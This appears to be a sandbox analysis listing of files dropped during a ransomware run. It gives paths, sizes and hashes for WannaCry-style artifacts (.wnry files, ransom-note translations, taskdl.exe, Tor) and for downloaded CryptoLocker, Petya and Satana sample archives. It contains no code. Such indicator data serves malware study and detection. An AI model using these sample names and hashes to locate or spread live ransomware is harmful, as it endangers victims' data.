C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x698r3gu.default-release\datareporting\glean\pending_pings\256a0045-cde3-4316-a0cf-d50b63310747

Filesize
4KB

MD5
35e650436f5ce7ca04b9bd0afd0bb085

SHA1
8df7c4bd266fc771749c2c3c75c7ca5387abfb76

SHA256
eb6940722d266f27fab3c849e197acb6218bad4f01c18da49bcc732fb9b2cf5c

SHA512
a0be1d5930632346f3c2d43f7aa5009ca35e0af87e9e0ea2eb2eb9ecdae03bf670d1974d5e42718bb2702a880fd6d4f628771a3e5025dc49e0a7593ada9e7218

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x698r3gu.default-release\datareporting\glean\pending_pings\607d42aa-1487-46e0-9466-d66d66109aad

Filesize
26KB

MD5
696149b4398a3863b7fedb5718274023

SHA1
f7d62570cae4ba99511b251c2577d93631757a1c

SHA256
d3866e8b3c5a06ec1d3b1f68bcb485bc5be5fa6a0e0bf41cd3cd37c36cb66aee

SHA512
dbe418d426930c5925d7ea757eda2eea88952c5d5fc07b12bd2f8e11bea159a3399465583debd31c703319e8904961cfec3ade613525d60457d9761ce94ec004

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x698r3gu.default-release\datareporting\glean\pending_pings\adab8dec-1141-45e5-beb5-23f61d532a1f

Filesize
671B

MD5
da9228ee1e2435a30e28b227a123c786

SHA1
5c130f2db52648771f9d1ce7f6de485d42f00b05

SHA256
153a0cca81b722398073afa14ea6d9865a3aff659943cb64d2c635bc1bea2590

SHA512
d1f640f0cce2319c401ab41c9808b556d827c506c2325bd42b19ff476bb348b74ae784988b11fee2ee92fb861374cab2e650ba629e94ca24dad228f559d6bce7

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x698r3gu.default-release\datareporting\glean\pending_pings\d9799acf-8f33-45a6-bfbb-6f3c1a487085

Filesize
982B

MD5
d376c0c2a9fb8ef1eacff5bb5d1c616a

SHA1
f22c631db8a5d4935f6f02bae074915b1452e18c

SHA256
d1b783fff076b6edf2831ab1bd876318e7b9a596dfed81396db9fe7c096f3b0e

SHA512
90f9f2ebbcabb2b900e8c836c41db5b0ffce6a72ed9c75da0ecd63c8d6e8ae7b19beb965b8d87cdb5ca322a6f57739724d46b265cd52cd1157130316ef141583

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x698r3gu.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

Filesize
1.1MB

MD5
842039753bf41fa5e11b3a1383061a87

SHA1
3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

SHA256
d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

SHA512
d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x698r3gu.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

Filesize
116B

MD5
2a461e9eb87fd1955cea740a3444ee7a

SHA1
b10755914c713f5a4677494dbe8a686ed458c3c5

SHA256
4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

SHA512
34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x698r3gu.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

Filesize
372B

MD5
bf957ad58b55f64219ab3f793e374316

SHA1
a11adc9d7f2c28e04d9b35e23b7616d0527118a1

SHA256
bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

SHA512
79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x698r3gu.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

Filesize
17.8MB

MD5
daf7ef3acccab478aaa7d6dc1c60f865

SHA1
f8246162b97ce4a945feced27b6ea114366ff2ad

SHA256
bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

SHA512
5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x698r3gu.default-release\prefs-1.js

Filesize
11KB

MD5
d4d1baee9f9eac6d29e25726c5443f29

SHA1
770947a42b30cc4cc43e7041df7b9bea0e6cf6eb

SHA256
8448a746ae1f80926b5a4ffce0cd3727d0fef574bf93401e7e6c895cdb385b21

SHA512
b1093b6fcc4fadcf1e9d5419a769822155bdce35be0ffc054f80317569513952826657b30f8d582dfbabba82edbdd7bb0a7ccd06a515e9b52166c11f1e688941

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x698r3gu.default-release\prefs-1.js

Filesize
10KB

MD5
dc588eabb8cf5ccd08445466d83fb00c

SHA1
f7209509a831b79e46577897a91d2b50faefceac

SHA256
125d807b8ba5a67a4a80e21b0a677c623fad0645492eb9278b59cce6a8c1b098

SHA512
9e8e39f5c80fe8831d766ebb78ee915982b3aeadaf3d3d5aafcb9e5fd49a226a12f02825b293fce52d964ff28db7c6898ed5ba04a21ba9c4b5a115000488f461

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x698r3gu.default-release\sessionCheckpoints.json

Filesize
259B

MD5
e6c20f53d6714067f2b49d0e9ba8030e

SHA1
f516dc1084cdd8302b3e7f7167b905e603b6f04f

SHA256
50a670fb78ff2712aae2c16d9499e01c15fddf24e229330d02a69b0527a38092

SHA512
462415b8295c1cdcac0a7cb16bb8a027ef36ae2ce0b061071074ac3209332a7eae71de843af4b96bbbd6158ca8fd5c18147bf9a79b8a7768a9a35edce8b784bf

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x698r3gu.default-release\sessionstore-backups\recovery.baklz4

Filesize
3KB

MD5
135b83de886eb8964948890d4e94879c

SHA1
392809bff45d54a5cc18e60ddf85f2a3ddc758c8

SHA256
e7d13c869d56f6302ee45904522ff62e8d0bdc7ffe2397994bf374923cd6097b

SHA512
7a88fbf839eb48fd5918975e0488e7761edcbd0b97ddf58f1e54aa54ea2267fdc57a17120614aa30bdc0b637e41e169414114dcc5f0015c8cb8334b2f3c5878f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\x698r3gu.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

Filesize
384KB

MD5
3061015ccd7cbf856d5d39d2e4fbe928

SHA1
ebea48009f1ed533f45b598bdd995f6da73987db

SHA256
2e249462a9a31b58b2291e22a03479840bf7ddf6d5f04f9aee49f6c1c4ee26cc

SHA512
c9a5fe521cf213d1cc8d5a952807936958bd944cd770ffa50845e54fbadbd9fe69ab125290089d15cc0cea5f467a28705594c196eb4fb41baeb8f7a0bf8da8e8

Download Submit
C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new

Filesize
5.1MB

MD5
b548df4f5ad9e7ef40981fadd52af9ad

SHA1
02a46f081a9810e9a6f9b0403557e5dcdad5bc02

SHA256
3fdf65296cfa39524029852e5ea661c1bc048ce9c99f910eb5c694a2cbaa785f

SHA512
11368495649299e3d4089c22a0c35eb4eede0a92883e51749c7b23804763795a28afc874f338a028a671af123d86e8789a4194a78777fd4c41fb56bc8834cba5

Download Submit
C:\Users\Admin\Desktop\325651725609530.bat

Filesize
318B

MD5
b741d0951bc2d29318d75208913ea377

SHA1
a13de54ccfbd4ea29d9f78b86615b028bd50d0a5

SHA256
595dc1b7a6f1d7933c2d142d773e445dbc7b1a2089243b51193bc7f730b1c8df

SHA512
bf7b44ba7f0cfe093b24f26b288b715c0f0910fa7dc5f318edfc5c4fdc8c9b8a3b6ced5b61672ecfa9820ffd054b5bc2650ae0812804d2b3fc901aa06dd3ca14

Download Submit
C:\Users\Admin\Desktop\325651725609530.bat

Filesize
318B

MD5
7e5b1424685a612291c65b80754c70dc

SHA1
e3267125f713e1121bebe8ec2e39d5059155219b

SHA256
ff839e80c98f06b758ddcc79339adff3b7f9c14781da773fb031f550d24a0de3

SHA512
dca804e61749a33d06ca3c0b52763113fe666d321045ca0e9a2c098ac91f01d281f3dc9dccbf944a460d598bba4304e76cdc77d9e83e4ff6413866867967e841

Download Submit
C:\Users\Admin\Desktop\@[email protected]

Filesize
933B

MD5
7a2726bb6e6a79fb1d092b7f2b688af0

SHA1
b3effadce8b76aee8cd6ce2eccbb8701797468a2

SHA256
840ab19c411c918ea3e7526d0df4b9cb002de5ea15e854389285df0d1ea9a8e5

SHA512
4e107f661e6be183659fdd265e131a64cce2112d842226305f6b111d00109a970fda0b5abfb1daa9f64428e445e3b472332392435707c9aebbfe94c480c72e54

Download Submit
C:\Users\Admin\Desktop\@[email protected]

Filesize
583B

MD5
6193dcf94ff02167143c87c79603179c

SHA1
02e318be040bcb1857ae9c30795998b375005f2e

SHA256
ad4f693c2081dd0fcd075f3e11c9164f7fac74663df3fa1a24ea7b09844b4898

SHA512
582421e99240d810505125ddbda8f85ac7b1e46634686880cec5a9092b04bd079a6e6506a2fc5bad0151d1dbe800e3636e593398d4081625c333894cf6227727

Download Submit
C:\Users\Admin\Desktop\TaskData\Tor\tor.exe

Filesize
3.0MB

MD5
fe7eb54691ad6e6af77f8a9a0b6de26d

SHA1
53912d33bec3375153b7e4e68b78d66dab62671a

SHA256
e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb

SHA512
8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

Download Submit
C:\Users\Admin\Desktop\b.wnry

Filesize
1.4MB

MD5
c17170262312f3be7027bc2ca825bf0c

SHA1
f19eceda82973239a1fdc5826bce7691e5dcb4fb

SHA256
d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

SHA512
c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

Download Submit
C:\Users\Admin\Desktop\c.wnry

Filesize
780B

MD5
8124a611153cd3aceb85a7ac58eaa25d

SHA1
c1d5cd8774261d810dca9b6a8e478d01cd4995d6

SHA256
0ceb451c1dbefaa8231eeb462e8ce639863eb5b8ae4fa63a353eb6e86173119e

SHA512
b9c8dfb5d58c95628528cc729d2394367c5e205328645ca6ef78a3552d9ad9f824ae20611a43a6e01daaffeffdc9094f80d772620c731e4192eb0835b8ed0f17

Download Submit
C:\Users\Admin\Desktop\m.vbs

Filesize
197B

MD5
94bdc24abf89cb36e00816911e6ae19e

SHA1
87335eea1d8eb1d70e715cc88daf248bb1f83021

SHA256
e9757f002a632de82ff9bd1283f90bcff2eec4ce6926f8b7e37879ff0c518660

SHA512
3bec73a3c6360499bb280aec0562157cda47c8ed11e3b1280c4fb8a457ab48dc1f3aea42d6a0d5c2842d60ca09436da96ef7136c0652d2b5c613fae87799ac0f

Download Submit
C:\Users\Admin\Desktop\msg\m_bulgarian.wnry

Filesize
46KB

MD5
95673b0f968c0f55b32204361940d184

SHA1
81e427d15a1a826b93e91c3d2fa65221c8ca9cff

SHA256
40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd

SHA512
7601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92

Download Submit
C:\Users\Admin\Desktop\msg\m_chinese (simplified).wnry

Filesize
53KB

MD5
0252d45ca21c8e43c9742285c48e91ad

SHA1
5c14551d2736eef3a1c1970cc492206e531703c1

SHA256
845d0e178aeebd6c7e2a2e9697b2bf6cf02028c50c288b3ba88fe2918ea2834a

SHA512
1bfcf6c0e7c977d777f12bd20ac347630999c4d99bd706b40de7ff8f2f52e02560d68093142cc93722095657807a1480ce3fb6a2e000c488550548c497998755

Download Submit
C:\Users\Admin\Desktop\msg\m_chinese (traditional).wnry

Filesize
77KB

MD5
2efc3690d67cd073a9406a25005f7cea

SHA1
52c07f98870eabace6ec370b7eb562751e8067e9

SHA256
5c7f6ad1ec4bc2c8e2c9c126633215daba7de731ac8b12be10ca157417c97f3a

SHA512
0766c58e64d9cda5328e00b86f8482316e944aa2c26523a3c37289e22c34be4b70937033bebdb217f675e40db9fecdce0a0d516f9065a170e28286c2d218487c

Download Submit
C:\Users\Admin\Desktop\msg\m_croatian.wnry

Filesize
38KB

MD5
17194003fa70ce477326ce2f6deeb270

SHA1
e325988f68d327743926ea317abb9882f347fa73

SHA256
3f33734b2d34cce83936ce99c3494cd845f1d2c02d7f6da31d42dfc1ca15a171

SHA512
dcf4ccf0b352a8b271827b3b8e181f7d6502ca0f8c9dda3dc6e53441bb4ae6e77b49c9c947cc3ede0bf323f09140a0c068a907f3c23ea2a8495d1ad96820051c

Download Submit
C:\Users\Admin\Desktop\msg\m_czech.wnry

Filesize
39KB

MD5
537efeecdfa94cc421e58fd82a58ba9e

SHA1
3609456e16bc16ba447979f3aa69221290ec17d0

SHA256
5afa4753afa048c6d6c39327ce674f27f5f6e5d3f2a060b7a8aed61725481150

SHA512
e007786ffa09ccd5a24e5c6504c8de444929a2faaafad3712367c05615b7e1b0fbf7fbfff7028ed3f832ce226957390d8bf54308870e9ed597948a838da1137b

Download Submit
C:\Users\Admin\Desktop\msg\m_danish.wnry

Filesize
36KB

MD5
2c5a3b81d5c4715b7bea01033367fcb5

SHA1
b548b45da8463e17199daafd34c23591f94e82cd

SHA256
a75bb44284b9db8d702692f84909a7e23f21141866adf3db888042e9109a1cb6

SHA512
490c5a892fac801b853c348477b1140755d4c53ca05726ac19d3649af4285c93523393a3667e209c71c80ac06ffd809f62dd69ae65012dcb00445d032f1277b3

Download Submit
C:\Users\Admin\Desktop\msg\m_dutch.wnry

Filesize
36KB

MD5
7a8d499407c6a647c03c4471a67eaad7

SHA1
d573b6ac8e7e04a05cbbd6b7f6a9842f371d343b

SHA256
2c95bef914da6c50d7bdedec601e589fbb4fda24c4863a7260f4f72bd025799c

SHA512
608ef3ff0a517fe1e70ff41aeb277821565c5a9bee5103aa5e45c68d4763fce507c2a34d810f4cd242d163181f8341d9a69e93fe32aded6fbc7f544c55743f12

Download Submit
C:\Users\Admin\Desktop\msg\m_english.wnry

Filesize
36KB

MD5
fe68c2dc0d2419b38f44d83f2fcf232e

SHA1
6c6e49949957215aa2f3dfb72207d249adf36283

SHA256
26fd072fda6e12f8c2d3292086ef0390785efa2c556e2a88bd4673102af703e5

SHA512
941fa0a1f6a5756ed54260994db6158a7ebeb9e18b5c8ca2f6530c579bc4455918df0b38c609f501ca466b3cc067b40e4b861ad6513373b483b36338ae20a810

Download Submit
C:\Users\Admin\Desktop\msg\m_filipino.wnry

Filesize
36KB

MD5
08b9e69b57e4c9b966664f8e1c27ab09

SHA1
2da1025bbbfb3cd308070765fc0893a48e5a85fa

SHA256
d8489f8c16318e524b45de8b35d7e2c3cd8ed4821c136f12f5ef3c9fc3321324

SHA512
966b5ed68be6b5ccd46e0de1fa868cfe5432d9bf82e1e2f6eb99b2aef3c92f88d96f4f4eec5e16381b9c6db80a68071e7124ca1474d664bdd77e1817ec600cb4

Download Submit
C:\Users\Admin\Desktop\msg\m_finnish.wnry

Filesize
37KB

MD5
35c2f97eea8819b1caebd23fee732d8f

SHA1
e354d1cc43d6a39d9732adea5d3b0f57284255d2

SHA256
1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

SHA512
908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

Download Submit
C:\Users\Admin\Desktop\msg\m_french.wnry

Filesize
37KB

MD5
4e57113a6bf6b88fdd32782a4a381274

SHA1
0fccbc91f0f94453d91670c6794f71348711061d

SHA256
9bd38110e6523547aed50617ddc77d0920d408faeed2b7a21ab163fda22177bc

SHA512
4f1918a12269c654d44e9d394bc209ef0bc32242be8833a2fba437b879125177e149f56f2fb0c302330dec328139b34982c04b3fefb045612b6cc9f83ec85aa9

Download Submit
C:\Users\Admin\Desktop\msg\m_german.wnry

Filesize
36KB

MD5
3d59bbb5553fe03a89f817819540f469

SHA1
26781d4b06ff704800b463d0f1fca3afd923a9fe

SHA256
2adc900fafa9938d85ce53cb793271f37af40cf499bcc454f44975db533f0b61

SHA512
95719ae80589f71209bb3cb953276538040e7111b994d757b0a24283aefe27aadbbe9eef3f1f823ce4cabc1090946d4a2a558607ac6cac6faca5971529b34dac

Download Submit
C:\Users\Admin\Desktop\msg\m_greek.wnry

Filesize
47KB

MD5
fb4e8718fea95bb7479727fde80cb424

SHA1
1088c7653cba385fe994e9ae34a6595898f20aeb

SHA256
e13cc9b13aa5074dc45d50379eceb17ee39a0c2531ab617d93800fe236758ca9

SHA512
24db377af1569e4e2b2ebccec42564cea95a30f1ff43bcaf25a692f99567e027bcef4aacef008ec5f64ea2eef0c04be88d2b30bcadabb3919b5f45a6633940cb

Download Submit
C:\Users\Admin\Desktop\msg\m_indonesian.wnry

Filesize
36KB

MD5
3788f91c694dfc48e12417ce93356b0f

SHA1
eb3b87f7f654b604daf3484da9e02ca6c4ea98b7

SHA256
23e5e738aad10fb8ef89aa0285269aff728070080158fd3e7792fe9ed47c51f4

SHA512
b7dd9e6dc7c2d023ff958caf132f0544c76fae3b2d8e49753257676cc541735807b4befdf483bcae94c2dcde3c878c783b4a89dca0fecbc78f5bbf7c356f35cd

Download Submit
C:\Users\Admin\Desktop\msg\m_italian.wnry

Filesize
36KB

MD5
30a200f78498990095b36f574b6e8690

SHA1
c4b1b3c087bd12b063e98bca464cd05f3f7b7882

SHA256
49f2c739e7d9745c0834dc817a71bf6676ccc24a4c28dcddf8844093aab3df07

SHA512
c0da2aae82c397f6943a0a7b838f60eeef8f57192c5f498f2ecf05db824cfeb6d6ca830bf3715da7ee400aa8362bd64dc835298f3f0085ae7a744e6e6c690511

Download Submit
C:\Users\Admin\Desktop\msg\m_japanese.wnry

Filesize
79KB

MD5
b77e1221f7ecd0b5d696cb66cda1609e

SHA1
51eb7a254a33d05edf188ded653005dc82de8a46

SHA256
7e491e7b48d6e34f916624c1cda9f024e86fcbec56acda35e27fa99d530d017e

SHA512
f435fd67954787e6b87460db026759410fbd25b2f6ea758118749c113a50192446861a114358443a129be817020b50f21d27b1ebd3d22c7be62082e8b45223fc

Download Submit
C:\Users\Admin\Desktop\msg\m_korean.wnry

Filesize
89KB

MD5
6735cb43fe44832b061eeb3f5956b099

SHA1
d636daf64d524f81367ea92fdafa3726c909bee1

SHA256
552aa0f82f37c9601114974228d4fc54f7434fe3ae7a276ef1ae98a0f608f1d0

SHA512
60272801909dbba21578b22c49f6b0ba8cd0070f116476ff35b3ac8347b987790e4cc0334724244c4b13415a246e77a577230029e4561ae6f04a598c3f536c7e

Download Submit
C:\Users\Admin\Desktop\msg\m_latvian.wnry

Filesize
40KB

MD5
c33afb4ecc04ee1bcc6975bea49abe40

SHA1
fbea4f170507cde02b839527ef50b7ec74b4821f

SHA256
a0356696877f2d94d645ae2df6ce6b370bd5c0d6db3d36def44e714525de0536

SHA512
0d435f0836f61a5ff55b78c02fa47b191e5807a79d8a6e991f3115743df2141b3db42ba8bdad9ad259e12f5800828e9e72d7c94a6a5259312a447d669b03ec44

Download Submit
C:\Users\Admin\Desktop\msg\m_norwegian.wnry

Filesize
36KB

MD5
ff70cc7c00951084175d12128ce02399

SHA1
75ad3b1ad4fb14813882d88e952208c648f1fd18

SHA256
cb5da96b3dfcf4394713623dbf3831b2a0b8be63987f563e1c32edeb74cb6c3a

SHA512
f01df3256d49325e5ec49fd265aa3f176020c8ffec60eb1d828c75a3fa18ff8634e1de824d77dfdd833768acff1f547303104620c70066a2708654a07ef22e19

Download Submit
C:\Users\Admin\Desktop\msg\m_polish.wnry

Filesize
38KB

MD5
e79d7f2833a9c2e2553c7fe04a1b63f4

SHA1
3d9f56d2381b8fe16042aa7c4feb1b33f2baebff

SHA256
519ad66009a6c127400c6c09e079903223bd82ecc18ad71b8e5cd79f5f9c053e

SHA512
e0159c753491cac7606a7250f332e87bc6b14876bc7a1cf5625fa56ab4f09c485f7b231dd52e4ff0f5f3c29862afb1124c0efd0741613eb97a83cbe2668af5de

Download Submit
C:\Users\Admin\Desktop\msg\m_portuguese.wnry

Filesize
37KB

MD5
fa948f7d8dfb21ceddd6794f2d56b44f

SHA1
ca915fbe020caa88dd776d89632d7866f660fc7a

SHA256
bd9f4b3aedf4f81f37ec0a028aabcb0e9a900e6b4de04e9271c8db81432e2a66

SHA512
0d211bfb0ae953081dca00cd07f8c908c174fd6c47a8001fadc614203f0e55d9fbb7fa9b87c735d57101341ab36af443918ee00737ed4c19ace0a2b85497f41a

Download Submit
C:\Users\Admin\Desktop\msg\m_romanian.wnry

Filesize
50KB

MD5
313e0ececd24f4fa1504118a11bc7986

SHA1
e1b9ae804c7fb1d27f39db18dc0647bb04e75e9d

SHA256
70c0f32ed379ae899e5ac975e20bbbacd295cf7cd50c36174d2602420c770ac1

SHA512
c7500363c61baf8b77fce796d750f8f5e6886ff0a10f81c3240ea3ad4e5f101b597490dea8ab6bd9193457d35d8fd579fce1b88a1c8d85ebe96c66d909630730

Download Submit
C:\Users\Admin\Desktop\msg\m_russian.wnry

Filesize
46KB

MD5
452615db2336d60af7e2057481e4cab5

SHA1
442e31f6556b3d7de6eb85fbac3d2957b7f5eac6

SHA256
02932052fafe97e6acaaf9f391738a3a826f5434b1a013abbfa7a6c1ade1e078

SHA512
7613dc329abe7a3f32164c9a6b660f209a84b774ab9c008bf6503c76255b30ea9a743a6dc49a8de8df0bcb9aea5a33f7408ba27848d9562583ff51991910911f

Download Submit
C:\Users\Admin\Desktop\msg\m_slovak.wnry

Filesize
40KB

MD5
c911aba4ab1da6c28cf86338ab2ab6cc

SHA1
fee0fd58b8efe76077620d8abc7500dbfef7c5b0

SHA256
e64178e339c8e10eac17a236a67b892d0447eb67b1dcd149763dad6fd9f72729

SHA512
3491ed285a091a123a1a6d61aafbb8d5621ccc9e045a237a2f9c2cf6049e7420eb96ef30fdcea856b50454436e2ec468770f8d585752d73fafd676c4ef5e800a

Download Submit
C:\Users\Admin\Desktop\msg\m_spanish.wnry

Filesize
36KB

MD5
8d61648d34cba8ae9d1e2a219019add1

SHA1
2091e42fc17a0cc2f235650f7aad87abf8ba22c2

SHA256
72f20024b2f69b45a1391f0a6474e9f6349625ce329f5444aec7401fe31f8de1

SHA512
68489c33ba89edfe2e3aebaacf8ef848d2ea88dcbef9609c258662605e02d12cfa4ffdc1d266fc5878488e296d2848b2cb0bbd45f1e86ef959bab6162d284079

Download Submit
C:\Users\Admin\Desktop\msg\m_swedish.wnry

Filesize
37KB

MD5
c7a19984eb9f37198652eaf2fd1ee25c

SHA1
06eafed025cf8c4d76966bf382ab0c5e1bd6a0ae

SHA256
146f61db72297c9c0facffd560487f8d6a2846ecec92ecc7db19c8d618dbc3a4

SHA512
43dd159f9c2eac147cbff1dda83f6a83dd0c59d2d7acac35ba8b407a04ec9a1110a6a8737535d060d100ede1cb75078cf742c383948c9d4037ef459d150f6020

Download Submit
C:\Users\Admin\Desktop\msg\m_turkish.wnry

Filesize
41KB

MD5
531ba6b1a5460fc9446946f91cc8c94b

SHA1
cc56978681bd546fd82d87926b5d9905c92a5803

SHA256
6db650836d64350bbde2ab324407b8e474fc041098c41ecac6fd77d632a36415

SHA512
ef25c3cf4343df85954114f59933c7cc8107266c8bcac3b5ea7718eb74dbee8ca8a02da39057e6ef26b64f1dfccd720dd3bf473f5ae340ba56941e87d6b796c9

Download Submit
C:\Users\Admin\Desktop\msg\m_vietnamese.wnry

Filesize
91KB

MD5
8419be28a0dcec3f55823620922b00fa

SHA1
2e4791f9cdfca8abf345d606f313d22b36c46b92

SHA256
1f21838b244c80f8bed6f6977aa8a557b419cf22ba35b1fd4bf0f98989c5bdf8

SHA512
8fca77e54480aea3c0c7a705263ed8fb83c58974f5f0f62f12cc97c8e0506ba2cdb59b70e59e9a6c44dd7cde6adeeec35b494d31a6a146ff5ba7006136ab9386

Download Submit
C:\Users\Admin\Desktop\r.wnry

Filesize
864B

MD5
3e0020fc529b1c2a061016dd2469ba96

SHA1
c3a91c22b63f6fe709e7c29cafb29a2ee83e6ade

SHA256
402751fa49e0cb68fe052cb3db87b05e71c1d950984d339940cf6b29409f2a7c

SHA512
5ca3c134201ed39d96d72911c0498bae6f98701513fd7f1dc8512819b673f0ea580510fa94ed9413ccc73da18b39903772a7cbfa3478176181cee68c896e14cf

Download Submit
C:\Users\Admin\Desktop\s.wnry

Filesize
2.9MB

MD5
ad4c9de7c8c40813f200ba1c2fa33083

SHA1
d1af27518d455d432b62d73c6a1497d032f6120e

SHA256
e18fdd912dfe5b45776e68d578c3af3547886cf1353d7086c8bee037436dff4b

SHA512
115733d08e5f1a514808a20b070db7ff453fd149865f49c04365a8c6502fa1e5c3a31da3e21f688ab040f583cf1224a544aea9708ffab21405dde1c57f98e617

Download Submit
C:\Users\Admin\Desktop\t.wnry

Filesize
64KB

MD5
5dcaac857e695a65f5c3ef1441a73a8f

SHA1
7b10aaeee05e7a1efb43d9f837e9356ad55c07dd

SHA256
97ebce49b14c46bebc9ec2448d00e1e397123b256e2be9eba5140688e7bc0ae6

SHA512
06eb5e49d19b71a99770d1b11a5bb64a54bf3352f36e39a153469e54205075c203b08128dc2317259db206ab5323bdd93aaa252a066f57fb5c52ff28deedb5e2

Download Submit
C:\Users\Admin\Desktop\taskdl.exe

Filesize
20KB

MD5
4fef5e34143e646dbf9907c4374276f5

SHA1
47a9ad4125b6bd7c55e4e7da251e23f089407b8f

SHA256
4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79

SHA512
4550dd1787deb353ebd28363dd2cdccca861f6a5d9358120fa6aa23baa478b2a9eb43cef5e3f6426f708a0753491710ac05483fac4a046c26bec4234122434d5

Download Submit
C:\Users\Admin\Desktop\taskse.exe

Filesize
20KB

MD5
8495400f199ac77853c53b5a3f278f3e

SHA1
be5d6279874da315e3080b06083757aad9b32c23

SHA256
2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d

SHA512
0669c524a295a049fa4629b26f89788b2a74e1840bcdc50e093a0bd40830dd1279c9597937301c0072db6ece70adee4ace67c3c8a4fb2db6deafd8f1e887abe4

Download Submit
C:\Users\Admin\Desktop\u.wnry

Filesize
240KB

MD5
7bf2b57f2a205768755c07f238fb32cc

SHA1
45356a9dd616ed7161a3b9192e2f318d0ab5ad10

SHA256
b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

SHA512
91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

Download Submit
C:\Users\Admin\Downloads\CryptoLocker_20Nov2013.zip.crdownload

Filesize
590KB

MD5
eb5eb336636e3f6cacf6c8db6bf4ea00

SHA1
e09eea305aa0f2897b3d7dac55c2ef2857bdfa5b

SHA256
43c5f2e7aacbc9a3439a810e3768087b7c8bea191ef84d71b2aa8686befed073

SHA512
4f728b1ae4b5328feb491e163950c78e888270fd4cd0a19396ff770e5ec2bd38815ce2fa6539bda69e4601150e6c9807708255e8219ded2a18420d8340bbffd5

Download Submit
C:\Users\Admin\Downloads\CryptoLocker_20Nov2013.zip:Zone.Identifier

Filesize
26B

MD5
fbccf14d504b7b2dbcb5a5bda75bd93b

SHA1
d59fc84cdd5217c6cf74785703655f78da6b582b

SHA256
eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

SHA512
aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Download Submit
C:\Users\Admin\Downloads\Ransomware.Petrwrap.zip.crdownload

Filesize
1.1MB

MD5
6884a35803f2e795fa4b121f636332b4

SHA1
527bfbf4436f9cce804152200c4808365e6ba8f9

SHA256
cf01329c0463865422caa595de325e5fe3f7fba44aabebaae11a6adfeb78b91c

SHA512
262732a9203e2f3593d45a9b26a1a03cc185a20cf28fad3505e257b960664983d2e4f2b19b9ff743015310bf593810bd049eb03d0fd8912a6d54de739742de60

Download Submit
C:\Users\Admin\Downloads\Ransomware.Petya.zip.crdownload

Filesize
538KB

MD5
e8fb95ebb7e0db4c68a32947a74b5ff9

SHA1
6f93f85342aa3ea7dcbe69cfb55d48e5027b296c

SHA256
33ca487a65d38bad82dccfa0d076bad071466e4183562d0b1ad1a2e954667fe9

SHA512
a2dea77b0283f4ed987c4de8860a9822bfd030be9c3096cda54f6159a89d461099e58efbc767bb8c04ae21ddd4289da578f8d938d78f30d40f9bca6567087320

Download Submit
C:\Users\Admin\Downloads\Ransomware.Satana.zip

Filesize
57KB

MD5
82f621944ee2639817400befabedffcf

SHA1
c183ae5ab43b9b3d3fabdb29859876c507a8d273

SHA256
